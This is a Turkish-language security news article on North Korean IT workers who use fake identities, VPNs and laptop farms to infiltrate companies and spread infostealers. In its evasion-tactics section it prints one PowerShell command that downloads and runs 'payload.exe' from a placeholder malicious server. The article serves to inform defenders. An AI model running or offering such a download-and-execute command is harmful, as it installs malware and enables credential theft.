En az 2018’den bu yana, binlerce Kuzey Koreli BT yüklenicisinden oluşan gizli bir ağ, meşru serbest çalışanlar gibi davranarak küresel teknoloji ve altyapı şirketlerine sızdı.
Yapay zeka tarafından oluşturulan vesikalık görüntülerle sahte kimlikler altında çalışan bu operatörler, coğrafi kökenlerini gizlemek ve platform doğrulama kontrollerini atlatmak için rutin olarak VPN hizmetlerini ve “dizüstü bilgisayar çiftliklerini” kullanıyor.
Geliştiriciler, mimarlar ve tasarımcılar gibi davranarak büyük serbest çalışan platformları ve kurumsal portallar üzerinde sözleşmeler güvence altına alıyorlar, çalınan kimlik bilgilerini ve hassas verileri sessizce yöneticilerine geri aktarıyorlar.
Başlangıçta VPN çıkış düğümlerindeki ve hesap oluşturma düzenlerindeki anormallikler yoluyla tespit edilen bu plan, 2024 yılının ortalarında bilgi hırsızlığı günlüklerinin NetKey gibi Kuzey Kore’ye ait VPN istemcilerinden gelen bağlantıları ortaya çıkarmaya başlamasıyla hız kazandı.
Güvenliği ihlal edilmiş iş istasyonlarına dağıtılan kötü amaçlı yazılım, oturum belirteçlerini, API anahtarlarını ve SSH yapılandırmalarını sızdırarak kurumsal ağlara anında şüphe uyandırmadan kalıcı erişim sağlar.
Kela Cyber analistleri, bu bilgi hırsızlığı enfeksiyonlarının çoğunun, Call.exe ve Time.exe gibi zararsız yürütülebilir dosyalar olarak gizlenen özel yükleyicilerin yanı sıra Python, Node.js ve JetBrains IDE’leri gibi ortak geliştirme araçlarından yararlandığını belirtti. (Binlerce Kuzey Koreli BT Çalışanı, VPN ve Dizüstü Bilgisayar Çiftliklerini Kullanarak Menşe Doğrulamasını Bypass Ediyor.pdf).
Meşru iş akışlarına karışan bu operatörler, yalnızca tespit edilmekten kaçınmakla kalmıyor, aynı zamanda casusluk faaliyetlerinin potansiyel etkisini de artırıyor.
Yalnızca 2025 yılında, Slack ve GitLab gibi işbirliği platformlarında ele geçirilen hesaplar ortaya çıktı ve saldırganların arka kapılarla bağlantılı yamalar dağıtmasına olanak tanıdı.
.webp)
Finans sektörü sahte banka havalelerinde artışlar yaşarken, kritik altyapı projelerinde izinsiz tasarım değişikliklerinin kod incelemelerinden kaçtığı görüldü; bu devlet destekli kampanyanın ciddiyetini vurgulayan tehditler.
Tespitten Kaçınma Taktikleri
Bu operasyonun temel taşı, coğrafi olarak dağınık “dizüstü bilgisayar çiftlikleri”nin (gerçek kullanıcı davranışını taklit etmek için IP adresleri üzerinden dönen uzaktan kontrol edilen makinelerden oluşan koleksiyonların) kullanılmasıdır.
Bilgi hırsızı, bir iş istasyonuna bulaştığında meşru bakım komut dosyalarına benzeyen komutlarla bir PowerShell yükleyicisini çalıştırır, örneğin: –
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.server/payload.exe','payload.exe'); Start-Process '.\payload.exe'"Bu teknik, yalnızca rutin güncellemeler kisvesi altında bilgi hırsızlığı yükünü almakla kalmıyor, aynı zamanda kaynak tabanlı güvenlik kontrollerini engellemek için IP rotasyonundan da yararlanıyor.
Buna paralel olarak operatörler, IxBrowser gibi tarayıcı korumalı alan araçları aracılığıyla kimlik yönetimini otomatikleştirerek her bir kişi için benzersiz kimlik bilgileri ve çok faktörlü belirteçler atamaktadır.
Bu katmanlı taktikler, anormal trafiğin gerçek geliştirici faaliyetleriyle kusursuz bir şekilde harmanlanmasını sağlayarak adli analizleri karmaşık hale getirir ve bekleme süresini uzatır.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
